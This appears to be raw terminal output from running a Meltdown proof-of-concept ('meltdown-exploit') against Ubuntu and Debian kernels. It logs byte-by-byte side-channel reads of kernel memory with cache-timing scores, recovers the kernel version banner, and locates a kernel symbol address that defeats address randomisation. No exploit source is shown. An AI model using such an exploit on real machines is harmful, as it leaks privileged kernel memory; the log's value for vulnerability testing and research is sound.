read ffffffff8000000a = ff (score=0/1000)
read ffffffff8000000b = ff (score=0/1000)
read ffffffff8000000c = ff (score=0/1000)
read ffffffff8000000d = ff (score=0/1000)
read ffffffff8000000e = ff (score=0/1000)
read ffffffff8000000f = ff (score=0/1000)
read ffffffff80000010 = ff (score=0/1000)
read ffffffff80000011 = ff (score=0/1000)
read ffffffff80000012 = ff (score=0/1000)
read ffffffff80000013 = ff (score=0/1000)
read ffffffff80000014 = ff (score=0/1000)
read ffffffff80000015 = ff (score=0/1000)
read ffffffff80000016 = ff (score=0/1000)
read ffffffff80000017 = ff (score=0/1000)
read ffffffff80000018 = ff (score=0/1000)
read ffffffff80000019 = ff (score=0/1000)
read ffffffff8000001a = ff (score=0/1000)
read ffffffff8000001b = ff (score=0/1000)
read ffffffff8000001c = ff (score=0/1000)
read ffffffff8000001d = ff (score=0/1000)
read ffffffff8000001e = ff (score=0/1000)
read ffffffff8000001f = ff (score=0/1000)
read ffffffff80000020 = ff (score=0/1000)
read ffffffff80000021 = ff (score=0/1000)
read ffffffff80000022 = ff (score=0/1000)
read ffffffff80000023 = ff (score=0/1000)
read ffffffff80000024 = ff (score=0/1000)
read ffffffff80000025 = ff (score=0/1000)
read ffffffff80000026 = ff (score=0/1000)
read ffffffff80000027 = ff (score=0/1000)
read ffffffff80000028 = ff (score=0/1000)
read ffffffff80000029 = ff (score=0/1000)
read ffffffff8000002a = ff (score=0/1000)
read ffffffff8000002b = ff (score=0/1000)
read ffffffff8000002c = ff (score=0/1000)
read ffffffff8000002d = ff (score=0/1000)
read ffffffff8000002e = ff (score=0/1000)
read ffffffff8000002f = ff (score=0/1000)
read ffffffff80000030 = ff (score=0/1000)
read ffffffff80000031 = ff (score=0/1000)
read ffffffff80000032 = ff (score=0/1000)
read ffffffff80000033 = ff (score=0/1000)
read ffffffff80000034 = ff (score=0/1000)
read ffffffff80000035 = ff (score=0/1000)
read ffffffff80000036 = ff (score=0/1000)
read ffffffff80000037 = ff (score=0/1000)
read ffffffff80000038 = ff (score=0/1000)
read ffffffff80000039 = ff (score=0/1000)
read ffffffff8000003a = ff (score=0/1000)
read ffffffff8000003b = ff (score=0/1000)
read ffffffff8000003c = ff (score=0/1000)
read ffffffff8000003d = ff (score=0/1000)
read ffffffff8000003e = ff (score=0/1000)
read ffffffff8000003f = ff (score=0/1000)
read ffffffff80000040 = ff (score=0/1000)
read ffffffff80000041 = ff (score=0/1000)
read ffffffff80000042 = ff (score=0/1000)
read ffffffff80000043 = ff (score=0/1000)
read ffffffff80000044 = ff (score=0/1000)
read ffffffff80000045 = ff (score=0/1000)
read ffffffff80000046 = ff (score=0/1000)
read ffffffff80000047 = ff (score=0/1000)
read ffffffff80000048 = ff (score=0/1000)
read ffffffff80000049 = ff (score=0/1000)
read ffffffff8000004a = ff (score=0/1000)
read ffffffff8000004b = ff (score=0/1000)
read ffffffff8000004c = ff (score=0/1000)
read ffffffff8000004d = ff (score=0/1000)
read ffffffff8000004e = ff (score=0/1000)
read ffffffff8000004f = ff (score=0/1000)
read ffffffff80000050 = ff (score=0/1000)
read ffffffff80000051 = ff (score=0/1000)
read ffffffff80000052 = ff (score=0/1000)
read ffffffff80000053 = ff (score=0/1000)
read ffffffff80000054 = ff (score=0/1000)
read ffffffff80000055 = ff (score=0/1000)
read ffffffff80000056 = ff (score=0/1000)
read ffffffff80000057 = ff (score=0/1000)
read ffffffff80000058 = ff (score=0/1000)
read ffffffff80000059 = ff (score=0/1000)
read ffffffff8000005a = ff (score=0/1000)
read ffffffff8000005b = ff (score=0/1000)
read ffffffff8000005c = ff (score=0/1000)
read ffffffff8000005d = ff (score=0/1000)
read ffffffff8000005e = ff (score=0/1000)
read ffffffff8000005f = ff (score=0/1000)
read ffffffff80000060 = ff (score=0/1000)
read ffffffff80000061 = ff (score=0/1000)
read ffffffff80000062 = ff (score=0/1000)
read ffffffff80000063 = ff (score=0/1000)
read ffffffff80000064 = ff (score=0/1000)
read ffffffff80000065 = ff (score=0/1000)
read ffffffff80000066 = ff (score=0/1000)
read ffffffff80000067 = ff (score=0/1000)
read ffffffff80000068 = ff (score=0/1000)
read ffffffff80000069 = ff (score=0/1000)
read ffffffff8000006a = ff (score=0/1000)
read ffffffff8000006b = ff (score=0/1000)
read ffffffff8000006c = ff (score=0/1000)
read ffffffff8000006d = ff (score=0/1000)
read ffffffff8000006e = ff (score=0/1000)
read ffffffff8000006f = ff (score=0/1000)
read ffffffff80000070 = ff (score=0/1000)
read ffffffff80000071 = ff (score=0/1000)
read ffffffff80000072 = ff (score=0/1000)
read ffffffff80000073 = ff (score=0/1000)
read ffffffff80000074 = ff (score=0/1000)
read ffffffff80000075 = ff (score=0/1000)
read ffffffff80000076 = ff (score=0/1000)
read ffffffff80000077 = ff (score=0/1000)
read ffffffff80000078 = ff (score=0/1000)
read ffffffff80000079 = ff (score=0/1000)
read ffffffff8000007a = ff (score=0/1000)
read ffffffff8000007b = ff (score=0/1000)
read ffffffff8000007c = ff (score=0/1000)
read ffffffff8000007d = ff (score=0/1000)
read ffffffff8000007e = ff (score=0/1000)
read ffffffff8000007f = ff (score=0/1000)
read ffffffff80000080 = ff (score=0/1000)
read ffffffff80000081 = ff (score=0/1000)
read ffffffff80000082 = ff (score=0/1000)
read ffffffff80000083 = ff (score=0/1000)
read ffffffff80000084 = ff (score=0/1000)
read ffffffff80000085 = ff (score=0/1000)
read ffffffff80000086 = ff (score=0/1000)
read ffffffff80000087 = ff (score=0/1000)
read ffffffff80000088 = ff (score=0/1000)
read ffffffff80000089 = ff (score=0/1000)
read ffffffff8000008a = ff (score=0/1000)
read ffffffff8000008b = ff (score=0/1000)
read ffffffff8000008c = ff (score=0/1000)
read ffffffff8000008d = ff (score=0/1000)
read ffffffff8000008e = ff (score=0/1000)
read ffffffff8000008f = ff (score=0/1000)
read ffffffff80000090 = ff (score=0/1000)
read ffffffff80000091 = ff (score=0/1000)
read ffffffff80000092 = ff (score=0/1000)
read ffffffff80000093 = ff (score=0/1000)
read ffffffff80000094 = ff (score=0/1000)
read ffffffff80000095 = ff (score=0/1000)
read ffffffff80000096 = ff (score=0/1000)
read ffffffff80000097 = ff (score=0/1000)
read ffffffff80000098 = ff (score=0/1000)
read ffffffff80000099 = ff (score=0/1000)
read ffffffff8000009a = ff (score=0/1000)
read ffffffff8000009b = ff (score=0/1000)
read ffffffff8000009c = ff (score=0/1000)
read ffffffff8000009d = ff (score=0/1000)
read ffffffff8000009e = ff (score=0/1000)
read ffffffff8000009f = ff (score=0/1000)
read ffffffff800000a0 = ff (score=0/1000)
read ffffffff800000a1 = ff (score=0/1000)
read ffffffff800000a2 = ff (score=0/1000)
read ffffffff800000a3 = ff (score=0/1000)
read ffffffff800000a4 = ff (score=0/1000)
read ffffffff800000a5 = ff (score=0/1000)
read ffffffff800000a6 = ff (score=0/1000)
read ffffffff800000a7 = ff (score=0/1000)
read ffffffff800000a8 = ff (score=0/1000)
read ffffffff800000a9 = ff (score=0/1000)
read ffffffff800000aa = ff (score=0/1000)
read ffffffff800000ab = ff (score=0/1000)
read ffffffff800000ac = ff (score=0/1000)
read ffffffff800000ad = ff (score=0/1000)
read ffffffff800000ae = ff (score=0/1000)
read ffffffff800000af = ff (score=0/1000)
read ffffffff800000b0 = ff (score=0/1000)
read ffffffff800000b1 = ff (score=0/1000)
read ffffffff800000b2 = ff (score=0/1000)
read ffffffff800000b3 = ff (score=0/1000)
read ffffffff800000b4 = ff (score=0/1000)
read ffffffff800000b5 = ff (score=0/1000)
read ffffffff800000b6 = ff (score=0/1000)
read ffffffff800000b7 = ff (score=0/1000)
read ffffffff800000b8 = ff (score=0/1000)
read ffffffff800000b9 = ff (score=0/1000)
read ffffffff800000ba = ff (score=0/1000)
read ffffffff800000bb = ff (score=0/1000)
read ffffffff800000bc = ff (score=0/1000)
read ffffffff800000bd = ff (score=0/1000)
read ffffffff800000be = ff (score=0/1000)
read ffffffff800000bf = ff (score=0/1000)
read ffffffff800000c0 = ff (score=0/1000)
read ffffffff800000c1 = ff (score=0/1000)
read ffffffff800000c2 = ff (score=0/1000)
read ffffffff800000c3 = ff (score=0/1000)
read ffffffff800000c4 = ff (score=0/1000)
read ffffffff800000c5 = ff (score=0/1000)
read ffffffff800000c6 = ff (score=0/1000)
read ffffffff800000c7 = ff (score=0/1000)
read ffffffff800000c8 = ff (score=0/1000)
read ffffffff800000c9 = ff (score=0/1000)
read ffffffff800000ca = ff (score=0/1000)
read ffffffff800000cb = ff (score=0/1000)
read ffffffff800000cc = ff (score=0/1000)
read ffffffff800000cd = ff (score=0/1000)
read ffffffff800000ce = ff (score=0/1000)
read ffffffff800000cf = ff (score=0/1000)
read ffffffff800000d0 = ff (score=0/1000)
read ffffffff800000d1 = ff (score=0/1000)
read ffffffff800000d2 = ff (score=0/1000)
read ffffffff800000d3 = ff (score=0/1000)
read ffffffff800000d4 = ff (score=0/1000)
read ffffffff800000d5 = ff (score=0/1000)
read ffffffff800000d6 = ff (score=0/1000)
read ffffffff800000d7 = ff (score=0/1000)
read ffffffff800000d8 = ff (score=0/1000)
read ffffffff800000d9 = ff (score=0/1000)
read ffffffff800000da = ff (score=0/1000)
read ffffffff800000db = ff (score=0/1000)
read ffffffff800000dc = ff (score=0/1000)
read ffffffff800000dd = ff (score=0/1000)
read ffffffff800000de = ff (score=0/1000)
read ffffffff800000df = ff (score=0/1000)
read ffffffff800000e0 = ff (score=0/1000)
read ffffffff800000e1 = ff (score=0/1000)
read ffffffff800000e2 = ff (score=0/1000)
read ffffffff800000e3 = ff (score=0/1000)
read ffffffff800000e4 = ff (score=0/1000)
read ffffffff800000e5 = ff (score=0/1000)
read ffffffff800000e6 = ff (score=0/1000)
read ffffffff800000e7 = ff (score=0/1000)
read ffffffff800000e8 = ff (score=0/1000)
read ffffffff800000e9 = ff (score=0/1000)
read ffffffff800000ea = ff (score=0/1000)
read ffffffff800000eb = ff (score=0/1000)
read ffffffff800000ec = ff (score=0/1000)
read ffffffff800000ed = ff (score=0/1000)
read ffffffff800000ee = ff (score=0/1000)
read ffffffff800000ef = ff (score=0/1000)
read ffffffff800000f0 = ff (score=0/1000)
read ffffffff800000f1 = ff (score=0/1000)
read ffffffff800000f2 = ff (score=0/1000)
read ffffffff800000f3 = ff (score=0/1000)
read ffffffff800000f4 = ff (score=0/1000)
read ffffffff800000f5 = ff (score=0/1000)
read ffffffff800000f6 = ff (score=0/1000)
read ffffffff800000f7 = ff (score=0/1000)
read ffffffff800000f8 = ff (score=0/1000)
read ffffffff800000f9 = ff (score=0/1000)
read ffffffff800000fa = ff (score=0/1000)
read ffffffff800000fb = ff (score=0/1000)
read ffffffff800000fc = ff (score=0/1000)
read ffffffff800000fd = ff (score=0/1000)
read ffffffff800000fe = ff (score=0/1000)
read ffffffff800000ff = ff (score=0/1000)
Dumped: ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
NOT VULNERABLE
[...]
cached = 31, uncached = 260, threshold 89
read ffffffff81a00000 = ff (score=0/1000)
read ffffffff81a00001 = ff (score=0/1000)
read ffffffff81a00002 = ff (score=0/1000)
read ffffffff81a00003 = ff (score=0/1000)
read ffffffff81a00004 = ff (score=0/1000)
read ffffffff81a00005 = ff (score=0/1000)
read ffffffff81a00006 = ff (score=0/1000)
read ffffffff81a00007 = ff (score=0/1000)
read ffffffff81a00008 = ff (score=0/1000)
read ffffffff81a00009 = ff (score=0/1000)
read ffffffff81a0000a = ff (score=0/1000)
read ffffffff81a0000b = ff (score=0/1000)
read ffffffff81a0000c = ff (score=0/1000)
read ffffffff81a0000d = ff (score=0/1000)
read ffffffff81a0000e = ff (score=0/1000)
read ffffffff81a0000f = ff (score=0/1000)
read ffffffff81a00010 = ff (score=0/1000)
read ffffffff81a00011 = ff (score=0/1000)
read ffffffff81a00012 = ff (score=0/1000)
read ffffffff81a00013 = ff (score=0/1000)
read ffffffff81a00014 = ff (score=0/1000)
read ffffffff81a00015 = ff (score=0/1000)
read ffffffff81a00016 = ff (score=0/1000)
read ffffffff81a00017 = ff (score=0/1000)
read ffffffff81a00018 = ff (score=0/1000)
read ffffffff81a00019 = ff (score=0/1000)
read ffffffff81a0001a = ff (score=0/1000)
read ffffffff81a0001b = ff (score=0/1000)
read ffffffff81a0001c = ff (score=0/1000)
read ffffffff81a0001d = ff (score=0/1000)
read ffffffff81a0001e = ff (score=0/1000)
read ffffffff81a0001f = ff (score=0/1000)
read ffffffff81a00020 = ff (score=0/1000)
read ffffffff81a00021 = ff (score=0/1000)
read ffffffff81a00022 = ff (score=0/1000)
read ffffffff81a00023 = ff (score=0/1000)
read ffffffff81a00024 = ff (score=0/1000)
read ffffffff81a00025 = ff (score=0/1000)
read ffffffff81a00026 = ff (score=0/1000)
read ffffffff81a00027 = ff (score=0/1000)
read ffffffff81a00028 = ff (score=0/1000)
read ffffffff81a00029 = ff (score=0/1000)
read ffffffff81a0002a = ff (score=0/1000)
read ffffffff81a0002b = ff (score=0/1000)
read ffffffff81a0002c = ff (score=0/1000)
read ffffffff81a0002d = ff (score=0/1000)
read ffffffff81a0002e = ff (score=0/1000)
read ffffffff81a0002f = ff (score=0/1000)
read ffffffff81a00030 = ff (score=0/1000)
read ffffffff81a00031 = ff (score=0/1000)
read ffffffff81a00032 = ff (score=0/1000)
read ffffffff81a00033 = ff (score=0/1000)
read ffffffff81a00034 = ff (score=0/1000)
read ffffffff81a00035 = ff (score=0/1000)
read ffffffff81a00036 = ff (score=0/1000)
read ffffffff81a00037 = ff (score=0/1000)
read ffffffff81a00038 = ff (score=0/1000)
read ffffffff81a00039 = ff (score=0/1000)
read ffffffff81a0003a = ff (score=0/1000)
read ffffffff81a0003b = ff (score=0/1000)
read ffffffff81a0003c = ff (score=0/1000)
read ffffffff81a0003d = ff (score=0/1000)
read ffffffff81a0003e = ff (score=0/1000)
read ffffffff81a0003f = ff (score=0/1000)
read ffffffff81a00040 = 5f _ (score=973/1000)
read ffffffff81a00041 = 64 d (score=968/1000)
read ffffffff81a00042 = 65 e (score=977/1000)
read ffffffff81a00043 = 62 b (score=971/1000)
read ffffffff81a00044 = 75 u (score=977/1000)
read ffffffff81a00045 = 67 g (score=981/1000)
read ffffffff81a00046 = ff (score=0/1000)
read ffffffff81a00047 = ff (score=0/1000)
read ffffffff81a00048 = ff (score=0/1000)
read ffffffff81a00049 = ff (score=0/1000)
read ffffffff81a0004a = ff (score=0/1000)
read ffffffff81a0004b = ff (score=0/1000)
read ffffffff81a0004c = ff (score=0/1000)
read ffffffff81a0004d = ff (score=0/1000)
read ffffffff81a0004e = ff (score=0/1000)
read ffffffff81a0004f = ff (score=0/1000)
read ffffffff81a00050 = ff (score=0/1000)
read ffffffff81a00051 = ff (score=0/1000)
read ffffffff81a00052 = ff (score=0/1000)
read ffffffff81a00053 = ff (score=0/1000)
read ffffffff81a00054 = ff (score=0/1000)
read ffffffff81a00055 = ff (score=0/1000)
read ffffffff81a00056 = ff (score=0/1000)
read ffffffff81a00057 = ff (score=0/1000)
read ffffffff81a00058 = ff (score=0/1000)
read ffffffff81a00059 = ff (score=0/1000)
read ffffffff81a0005a = ff (score=0/1000)
read ffffffff81a0005b = ff (score=0/1000)
read ffffffff81a0005c = ff (score=0/1000)
read ffffffff81a0005d = ff (score=0/1000)
read ffffffff81a0005e = ff (score=0/1000)
read ffffffff81a0005f = ff (score=0/1000)
read ffffffff81a00060 = 25 % (score=980/1000)
read ffffffff81a00061 = 73 s (score=978/1000)
read ffffffff81a00062 = 20 (score=983/1000)
read ffffffff81a00063 = 76 v (score=971/1000)
read ffffffff81a00064 = 65 e (score=969/1000)
read ffffffff81a00065 = 72 r (score=980/1000)
read ffffffff81a00066 = 73 s (score=974/1000)
read ffffffff81a00067 = 69 i (score=979/1000)
read ffffffff81a00068 = 6f o (score=980/1000)
read ffffffff81a00069 = 6e n (score=972/1000)
read ffffffff81a0006a = 20 (score=978/1000)
read ffffffff81a0006b = 25 % (score=984/1000)
read ffffffff81a0006c = 73 s (score=978/1000)
read ffffffff81a0006d = 20 (score=982/1000)
read ffffffff81a0006e = 28 ( (score=980/1000)
read ffffffff81a0006f = 62 b (score=974/1000)
read ffffffff81a00070 = 75 u (score=976/1000)
read ffffffff81a00071 = 69 i (score=980/1000)
read ffffffff81a00072 = 6c l (score=975/1000)
read ffffffff81a00073 = 64 d (score=968/1000)
read ffffffff81a00074 = 64 d (score=970/1000)
read ffffffff81a00075 = 40 @ (score=983/1000)
read ffffffff81a00076 = 6c l (score=981/1000)
read ffffffff81a00077 = 67 g (score=984/1000)
read ffffffff81a00078 = 77 w (score=979/1000)
read ffffffff81a00079 = 30 0 (score=979/1000)
read ffffffff81a0007a = 31 1 (score=984/1000)
read ffffffff81a0007b = 2d - (score=980/1000)
read ffffffff81a0007c = 32 2 (score=980/1000)
read ffffffff81a0007d = 31 1 (score=934/1000)
read ffffffff81a0007e = 29 ) (score=978/1000)
read ffffffff81a0007f = 20 (score=981/1000)
read ffffffff81a00080 = 28 ( (score=989/1000)
read ffffffff81a00081 = 67 g (score=996/1000)
read ffffffff81a00082 = 63 c (score=982/1000)
read ffffffff81a00083 = 63 c (score=985/1000)
read ffffffff81a00084 = 20 (score=985/1000)
read ffffffff81a00085 = 76 v (score=990/1000)
read ffffffff81a00086 = 65 e (score=977/1000)
read ffffffff81a00087 = 72 r (score=994/1000)
read ffffffff81a00088 = 73 s (score=993/1000)
read ffffffff81a00089 = 69 i (score=989/1000)
read ffffffff81a0008a = 6f o (score=986/1000)
read ffffffff81a0008b = 6e n (score=980/1000)
read ffffffff81a0008c = 20 (score=978/1000)
read ffffffff81a0008d = 35 5 (score=981/1000)
read ffffffff81a0008e = 2e . (score=979/1000)
read ffffffff81a0008f = 33 3 (score=994/1000)
read ffffffff81a00090 = 2e . (score=982/1000)
read ffffffff81a00091 = 31 1 (score=992/1000)
read ffffffff81a00092 = 20 (score=988/1000)
read ffffffff81a00093 = 32 2 (score=990/1000)
read ffffffff81a00094 = 30 0 (score=995/1000)
read ffffffff81a00095 = 31 1 (score=985/1000)
read ffffffff81a00096 = 36 6 (score=984/1000)
read ffffffff81a00097 = 30 0 (score=994/1000)
read ffffffff81a00098 = 34 4 (score=985/1000)
read ffffffff81a00099 = 31 1 (score=986/1000)
read ffffffff81a0009a = 33 3 (score=989/1000)
read ffffffff81a0009b = 20 (score=993/1000)
read ffffffff81a0009c = 28 ( (score=993/1000)
read ffffffff81a0009d = 55 U (score=985/1000)
read ffffffff81a0009e = 62 b (score=986/1000)
read ffffffff81a0009f = 75 u (score=987/1000)
read ffffffff81a000a0 = 6e n (score=984/1000)
read ffffffff81a000a1 = 74 t (score=993/1000)
read ffffffff81a000a2 = 75 u (score=989/1000)
read ffffffff81a000a3 = 20 (score=989/1000)
read ffffffff81a000a4 = 35 5 (score=992/1000)
read ffffffff81a000a5 = 2e . (score=987/1000)
read ffffffff81a000a6 = 33 3 (score=988/1000)
read ffffffff81a000a7 = 2e . (score=978/1000)
read ffffffff81a000a8 = 31 1 (score=992/1000)
read ffffffff81a000a9 = 2d - (score=991/1000)
read ffffffff81a000aa = 31 1 (score=983/1000)
read ffffffff81a000ab = 34 4 (score=987/1000)
read ffffffff81a000ac = 75 u (score=994/1000)
read ffffffff81a000ad = 62 b (score=986/1000)
read ffffffff81a000ae = 75 u (score=994/1000)
read ffffffff81a000af = 6e n (score=978/1000)
read ffffffff81a000b0 = 74 t (score=992/1000)
read ffffffff81a000b1 = 75 u (score=988/1000)
read ffffffff81a000b2 = 32 2 (score=987/1000)
read ffffffff81a000b3 = 29 ) (score=990/1000)
read ffffffff81a000b4 = 20 (score=987/1000)
read ffffffff81a000b5 = 29 ) (score=990/1000)
read ffffffff81a000b6 = 20 (score=993/1000)
read ffffffff81a000b7 = 25 % (score=997/1000)
read ffffffff81a000b8 = 73 s (score=988/1000)
read ffffffff81a000b9 = ff (score=0/1000)
read ffffffff81a000ba = ff (score=0/1000)
read ffffffff81a000bb = ff (score=0/1000)
read ffffffff81a000bc = ff (score=0/1000)
read ffffffff81a000bd = ff (score=0/1000)
read ffffffff81a000be = ff (score=0/1000)
read ffffffff81a000bf = ff (score=0/1000)
read ffffffff81a000c0 = 4c L (score=988/1000)
read ffffffff81a000c1 = 69 i (score=988/1000)
read ffffffff81a000c2 = 6e n (score=979/1000)
read ffffffff81a000c3 = 75 u (score=985/1000)
read ffffffff81a000c4 = 78 x (score=988/1000)
read ffffffff81a000c5 = 20 (score=995/1000)
read ffffffff81a000c6 = 76 v (score=988/1000)
read ffffffff81a000c7 = 65 e (score=982/1000)
read ffffffff81a000c8 = 72 r (score=996/1000)
read ffffffff81a000c9 = 73 s (score=991/1000)
read ffffffff81a000ca = 69 i (score=990/1000)
read ffffffff81a000cb = 6f o (score=985/1000)
read ffffffff81a000cc = 6e n (score=983/1000)
read ffffffff81a000cd = 20 (score=989/1000)
read ffffffff81a000ce = 34 4 (score=987/1000)
read ffffffff81a000cf = 2e . (score=982/1000)
read ffffffff81a000d0 = 34 4 (score=990/1000)
read ffffffff81a000d1 = 2e . (score=986/1000)
read ffffffff81a000d2 = 30 0 (score=991/1000)
read ffffffff81a000d3 = 2d - (score=984/1000)
read ffffffff81a000d4 = 32 2 (score=992/1000)
read ffffffff81a000d5 = 31 1 (score=986/1000)
read ffffffff81a000d6 = 2d - (score=990/1000)
read ffffffff81a000d7 = 67 g (score=997/1000)
read ffffffff81a000d8 = 65 e (score=977/1000)
read ffffffff81a000d9 = 6e n (score=986/1000)
read ffffffff81a000da = 65 e (score=985/1000)
read ffffffff81a000db = 72 r (score=993/1000)
read ffffffff81a000dc = 69 i (score=984/1000)
read ffffffff81a000dd = 63 c (score=989/1000)
read ffffffff81a000de = 20 (score=993/1000)
read ffffffff81a000df = 28 ( (score=991/1000)
read ffffffff81a000e0 = 62 b (score=987/1000)
read ffffffff81a000e1 = 75 u (score=991/1000)
read ffffffff81a000e2 = 69 i (score=990/1000)
read ffffffff81a000e3 = 6c l (score=986/1000)
read ffffffff81a000e4 = 64 d (score=986/1000)
read ffffffff81a000e5 = 64 d (score=988/1000)
read ffffffff81a000e6 = 40 @ (score=986/1000)
read ffffffff81a000e7 = 6c l (score=984/1000)
read ffffffff81a000e8 = 67 g (score=992/1000)
read ffffffff81a000e9 = 77 w (score=990/1000)
read ffffffff81a000ea = 30 0 (score=996/1000)
read ffffffff81a000eb = 31 1 (score=988/1000)
read ffffffff81a000ec = 2d - (score=992/1000)
read ffffffff81a000ed = 32 2 (score=986/1000)
read ffffffff81a000ee = 31 1 (score=989/1000)
read ffffffff81a000ef = 29 ) (score=987/1000)
read ffffffff81a000f0 = 20 (score=989/1000)
read ffffffff81a000f1 = 28 ( (score=984/1000)
read ffffffff81a000f2 = 67 g (score=994/1000)
read ffffffff81a000f3 = 63 c (score=975/1000)
read ffffffff81a000f4 = 63 c (score=986/1000)
read ffffffff81a000f5 = 20 (score=986/1000)
read ffffffff81a000f6 = 76 v (score=989/1000)
read ffffffff81a000f7 = 65 e (score=981/1000)
read ffffffff81a000f8 = 72 r (score=992/1000)
read ffffffff81a000f9 = 73 s (score=990/1000)
read ffffffff81a000fa = 69 i (score=988/1000)
read ffffffff81a000fb = 6f o (score=984/1000)
read ffffffff81a000fc = 6e n (score=983/1000)
read ffffffff81a000fd = 20 (score=982/1000)
read ffffffff81a000fe = 35 5 (score=987/1000)
read ffffffff81a000ff = 2e . (score=979/1000)
Dumped: ����������������������������������������������������������������_debug��������������������������%s version %s (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) %s�������Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.
offset: 0x41 ; found __param_str_initcall_debug: ffffffff81a00041
real 3m31.602s
user 3m14.924s
sys 0m13.072s
Debian 9.0 (4.9.0-3-amd64)
user@debian-9-0-x64:~/Desktop/meltdown-exploit$ ./a.out 0xffffffffaec00000 100
cached = 41, uncached = 265, threshold 104
read ffffffffaec00000 = ff (score=0/1000)
read ffffffffaec00001 = ff (score=0/1000)
read ffffffffaec00002 = ff (score=0/1000)
read ffffffffaec00003 = ff (score=0/1000)
read ffffffffaec00004 = ff (score=0/1000)
read ffffffffaec00005 = ff (score=0/1000)
read ffffffffaec00006 = ff (score=0/1000)
read ffffffffaec00007 = ff (score=0/1000)
read ffffffffaec00008 = ff (score=0/1000)
read ffffffffaec00009 = ff (score=0/1000)
read ffffffffaec0000a = ff (score=0/1000)
read ffffffffaec0000b = ff (score=0/1000)
read ffffffffaec0000c = ff (score=0/1000)
read ffffffffaec0000d = ff (score=0/1000)
read ffffffffaec0000e = ff (score=0/1000)
read ffffffffaec0000f = ff (score=0/1000)
read ffffffffaec00010 = ff (score=0/1000)
read ffffffffaec00011 = ff (score=0/1000)
read ffffffffaec00012 = ff (score=0/1000)
read ffffffffaec00013 = ff (score=0/1000)
read ffffffffaec00014 = ff (score=0/1000)
read ffffffffaec00015 = ff (score=0/1000)
read ffffffffaec00016 = ff (score=0/1000)
read ffffffffaec00017 = ff (score=0/1000)
read ffffffffaec00018 = ff (score=0/1000)
read ffffffffaec00019 = ff (score=0/1000)
read ffffffffaec0001a = ff (score=0/1000)
read ffffffffaec0001b = ff (score=0/1000)
read ffffffffaec0001c = ff (score=0/1000)
read ffffffffaec0001d = ff (score=0/1000)
read ffffffffaec0001e = ff (score=0/1000)
read ffffffffaec0001f = ff (score=0/1000)
read ffffffffaec00020 = ff (score=0/1000)
read ffffffffaec00021 = ff (score=0/1000)
read ffffffffaec00022 = ff (score=0/1000)
read ffffffffaec00023 = ff (score=0/1000)
read ffffffffaec00024 = ff (score=0/1000)
read ffffffffaec00025 = ff (score=0/1000)
read ffffffffaec00026 = ff (score=0/1000)
read ffffffffaec00027 = ff (score=0/1000)
read ffffffffaec00028 = ff (score=0/1000)
read ffffffffaec00029 = ff (score=0/1000)
read ffffffffaec0002a = ff (score=0/1000)
read ffffffffaec0002b = ff (score=0/1000)
read ffffffffaec0002c = ff (score=0/1000)
read ffffffffaec0002d = ff (score=0/1000)
read ffffffffaec0002e = ff (score=0/1000)
read ffffffffaec0002f = ff (score=0/1000)
read ffffffffaec00030 = ff (score=0/1000)
read ffffffffaec00031 = ff (score=0/1000)
read ffffffffaec00032 = ff (score=0/1000)
read ffffffffaec00033 = ff (score=0/1000)
read ffffffffaec00034 = ff (score=0/1000)
read ffffffffaec00035 = ff (score=0/1000)
read ffffffffaec00036 = ff (score=0/1000)
read ffffffffaec00037 = ff (score=0/1000)
read ffffffffaec00038 = ff (score=0/1000)
read ffffffffaec00039 = ff (score=0/1000)
read ffffffffaec0003a = ff (score=0/1000)
read ffffffffaec0003b = ff (score=0/1000)
read ffffffffaec0003c = ff (score=0/1000)
read ffffffffaec0003d = ff (score=0/1000)
read ffffffffaec0003e = ff (score=0/1000)
read ffffffffaec0003f = ff (score=0/1000)
read ffffffffaec00040 = 5f _ (score=991/1000)
read ffffffffaec00041 = 64 d (score=982/1000)
read ffffffffaec00042 = 65 e (score=354/1000)
read ffffffffaec00043 = 62 b (score=977/1000)
read ffffffffaec00044 = 75 u (score=259/1000)
read ffffffffaec00045 = 67 g (score=985/1000)
read ffffffffaec00046 = ff (score=0/1000)
read ffffffffaec00047 = ff (score=0/1000)
read ffffffffaec00048 = ff (score=0/1000)
read ffffffffaec00049 = ff (score=0/1000)
read ffffffffaec0004a = ff (score=0/1000)
read ffffffffaec0004b = ff (score=0/1000)
read ffffffffaec0004c = ff (score=0/1000)
read ffffffffaec0004d = ff (score=0/1000)
read ffffffffaec0004e = ff (score=0/1000)
read ffffffffaec0004f = ff (score=0/1000)
read ffffffffaec00050 = ff (score=0/1000)
read ffffffffaec00051 = ff (score=0/1000)
read ffffffffaec00052 = ff (score=0/1000)
read ffffffffaec00053 = ff (score=0/1000)
read ffffffffaec00054 = ff (score=0/1000)
read ffffffffaec00055 = ff (score=0/1000)
read ffffffffaec00056 = ff (score=0/1000)
read ffffffffaec00057 = ff (score=0/1000)
read ffffffffaec00058 = ff (score=0/1000)
read ffffffffaec00059 = ff (score=0/1000)
read ffffffffaec0005a = ff (score=0/1000)
read ffffffffaec0005b = ff (score=0/1000)
read ffffffffaec0005c = ff (score=0/1000)
read ffffffffaec0005d = ff (score=0/1000)
read ffffffffaec0005e = ff (score=0/1000)
read ffffffffaec0005f = ff (score=0/1000)
read ffffffffaec00060 = 25 % (score=989/1000)
read ffffffffaec00061 = 73 s (score=991/1000)
read ffffffffaec00062 = 20 (score=947/1000)
read ffffffffaec00063 = 76 v (score=957/1000)
read ffffffffaec00064 = 65 e (score=502/1000)
read ffffffffaec00065 = 72 r (score=994/1000)
read ffffffffaec00066 = 73 s (score=990/1000)
read ffffffffaec00067 = 69 i (score=987/1000)
read ffffffffaec00068 = 6f o (score=990/1000)
read ffffffffaec00069 = 6e n (score=876/1000)
read ffffffffaec0006a = 20 (score=951/1000)
read ffffffffaec0006b = 25 % (score=990/1000)
read ffffffffaec0006c = 73 s (score=993/1000)
read ffffffffaec0006d = 20 (score=923/1000)
read ffffffffaec0006e = 28 ( (score=985/1000)
read ffffffffaec0006f = 64 d (score=982/1000)
read ffffffffaec00070 = 65 e (score=316/1000)
read ffffffffaec00071 = 62 b (score=979/1000)
read ffffffffaec00072 = 69 i (score=988/1000)
read ffffffffaec00073 = 61 a (score=975/1000)
read ffffffffaec00074 = 6e n (score=732/1000)
read ffffffffaec00075 = 2d - (score=910/1000)
read ffffffffaec00076 = 6b k (score=986/1000)
read ffffffffaec00077 = 65 e (score=455/1000)
read ffffffffaec00078 = 72 r (score=989/1000)
read ffffffffaec00079 = 6e n (score=747/1000)
